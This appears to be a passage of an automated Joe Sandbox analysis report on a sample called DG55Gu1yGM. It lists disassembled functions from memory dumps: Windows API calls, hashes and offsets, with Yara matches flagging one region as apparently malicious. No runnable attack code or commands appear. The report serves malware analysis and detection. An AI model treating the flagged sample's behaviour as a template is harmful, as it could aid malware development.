                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C$C
                                                                                                                                                                                                                                        • API String ID: 0-238425240
                                                                                                                                                                                                                                        • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                        • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02150A23,?,?,?,?,0215047A,?,00000004), ref: 0215B353
                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0215B3E3
                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0215B3F1
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02150A23,00000000,02150B43), ref: 0215B494
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2444527052-0
                                                                                                                                                                                                                                        • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                        • Instruction ID: 1bdfa9d4bbfc98338b67f5a2744407dacd13d8d7f8ca3af74ab0d30099dffad9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C261FA71684226EED724AF34CC41BBB73ADEF04718F1445A9ED26D7184EB74E640CBA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2444527052-0
                                                                                                                                                                                                                                        • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                        • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2834031935-0
                                                                                                                                                                                                                                        • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                        • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0212DAD7), ref: 0214A732
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0212DAD7), ref: 0214A73C
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0212DAD7), ref: 0214A749
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                        • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                        • Instruction ID: 6c7dc6e38017473173965b3673f9e11a2bcc60766f3cf5b3e739c2263e24c7c0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D531C77494131C9BCB21DF64DD88B9CBBB8BF08711F5041EAE40CA7250EB309B858F44
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                        • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                        • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,0215009C,00000000,00457970,0000000C,021501F3,00000000,00000002,00000000), ref: 021500E7
                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0215009C,00000000,00457970,0000000C,021501F3,00000000,00000002,00000000), ref: 021500EE
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 02150100
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                        • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                        • Instruction ID: c4b2f60779ba15f47c370bcf54b0f1131abee0df5897a2089ae5a3ea46abfd5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13E0B635080158EFCF116F94DD48A593B6AEF4AB86B5040A8FD258B131CB36DA42DA44
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                        • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                        • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction ID: c47a0ca15b32ba9ed95b3f1139f05f2783e18e5976a0671db0a234a546f7024c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F23169B6901619CFDB10CF99C880AAEBBF5FF18324F15414AE445B7210D771EA59CFA4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: /
                                                                                                                                                                                                                                        • API String ID: 0-2043925204
                                                                                                                                                                                                                                        • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                        • Instruction ID: 6048d82df8d7591915922f64e512b7af8ab0c2ab67d21ca34abfb81cd04791be
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2412672540229EECB209FB9CC48EAB77B9EB80714F1042A9ED15CB180E7719D81CB50
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: /
                                                                                                                                                                                                                                        • API String ID: 0-2043925204
                                                                                                                                                                                                                                        • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                        • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                        • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                        • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                        • Instruction ID: 06b2dd473b8bc18c666e3d42fe6f4a42c92cfbaa588d910ba1baf5c0d4465c40
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25021C71E402199FDF14CFA9C8906ADB7F2FF88714F258269D919E7784DB31A942CB80
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0212262C
                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 021227CA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4264772764-0
                                                                                                                                                                                                                                        • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                        • Instruction ID: 2a5b72282fb29ca95df501dafcf67312a562d430a3a77f2667bccdf25739de74
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31414125964344A5E730FFA4BC45B2533B0FF64722F10252BE528CB2B2E3B28554C75E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02156F21,?,?,00000008,?,?,0215F3E2,00000000), ref: 02157153
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                        • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                        • Instruction ID: 82a0fda67b383fb89ba8441391cc934519f009d17d39e456c7593a53a87bc3a1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5B12B31650618DFD719CF28C48AB65BBE1FF45368F258698E8A9CF2E1C335D992CB40
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                        • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                        • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 021521A0
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0215B900
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2955987475-0
                                                                                                                                                                                                                                        • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                        • Instruction ID: 8ac89f766487b4020ebc3dd44efcc18cab8905446f0fa148366470ac35648bd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA2183B259422ADFDF249F24DC41BBA77ADEF04318F1001BAED11D6154EB399A44CB50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2955987475-0
                                                                                                                                                                                                                                        • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                        • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02150A1C,?,0215BC89,00000000,?,?,?), ref: 0215B5A6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2016158738-0
                                                                                                                                                                                                                                        • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                        • Instruction ID: 51b9155cb2f9719646993c9c0efe00f9031f8e7685dcf35fb3f264d009aa63ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C11253B2147119FDB1C9F39C8A16BABB92FF84318B14482CDE5687A40D371B602CB40
                                                                                                                                                                                                                                        APIs
